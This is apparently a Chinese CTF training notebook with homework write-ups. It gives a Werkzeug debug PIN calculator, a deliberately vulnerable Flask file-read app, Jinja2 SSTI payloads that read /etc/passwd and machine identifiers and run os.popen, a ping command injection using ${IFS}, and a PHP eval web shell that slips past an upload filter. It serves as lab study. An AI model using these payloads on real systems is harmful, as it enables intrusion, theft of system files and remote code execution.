0%

CTF特训营(nodejs)

前言

8月19日笔记

python - pin

#计算ping值的脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
import hashlib
from itertools import chain
probably_public_bits = [
'kingkk',# username
'flask.app',# modname
'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/home/kingkk/.local/lib/python3.5/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
'52242498922',# str(uuid.getnode()), /sys/class/net/ens33/address
'19949f18ce36422da1402b3e3fe53008'# get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num

print(rv)

示例程序

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
# -*- coding: utf-8 -*-
import pdb
from flask import Flask, request
app = Flask(__name__)

@app.route("/")
def hello():
return Hello['a']

@app.route("/file")
def file():
filename = request.args.get('filename')
try:
with open(filename, 'r') as f:
return f.read()
except:
return 'error'

if __name__ == "__main__":
app.run(host="0.0.0.0", port=8080, debug=True)



if __name__ == "__main__":
app.debug = True
app.run('0.0.0.0',5000)

Hash碰撞

https://st4ck.gitee.io/2019/11/19/ha-xi-chang-du-kuo-zhan-gong-ji-yi-ji-hashpump-an-zhuang-shi-yong-he-liang-dao-ti-mu/

1
2
3
4
5
git clone https://github.com/bwall/HashPump
apt-get install g++ libssl-dev
cd HashPump
make
make install

作业

作业一 [GYCTF2020]FlaskApp

payload
读源码

1
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}{% endif %}{% endfor %}

读目录

1
{{''.__class__.__bases__[0].__subclasses__()[75].__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}

读文件

1
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('txt.galf_eht_si_siht/'[::-1],'r').read() }}{% endif %}{% endfor %}

payload2
读取用户

1
2
3
{{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}}

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/etc/passwd','r').read() }}{% endif %}{% endfor %}

读mac地址

1
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/sys/class/net/eth0/address','r').read() }}{% endif %}{% endfor %}

读machine-id地址,
docker 的位置:/proc/self/cgroup
linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i。

1
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/proc/self/cgroup','r').read() }}{% endif %}{% endfor %}

拿到信息后。算出pin值
然后就可以执行任意目录

1
2
3
__import__('o'+'s').listdir('/')

print(os.listdir('/'))

读取flag

1
__import__('o'+'s').popen('cat /this_is_the_fl'+'ag.txt').read()

拿到flag
flag{a6aa7ee6-5870-4e01-9f27-1bd6a42f0411}

作业二 9016

开始是这么一个页面
作业
测试输入127.0.0.1发现有执行了ping。
添加测试

127.0.0.1|ls
成功返回。但是使用空格后报错。证明过滤了空格。
作业

payload

1
ip=127.0.0.1|cat${IFS}flag.php&submit=bash

flag

$flag=”flag{8b8ff0b45a490c3e93c89a03468ee2c2}

作业三 uplad

作业
文件上传程序。
作业
上传了一个马,好像被过滤了

<?php
试试绕过。

1
2
3
<script language="Php">
@eval($_POST['hehe']);
</script>

flag

作业
拿到flag{3d73d4bb-fe0a-4f37-9517-d345379c8247}

坚持原创技术分享,您的支持将鼓励我继续创作!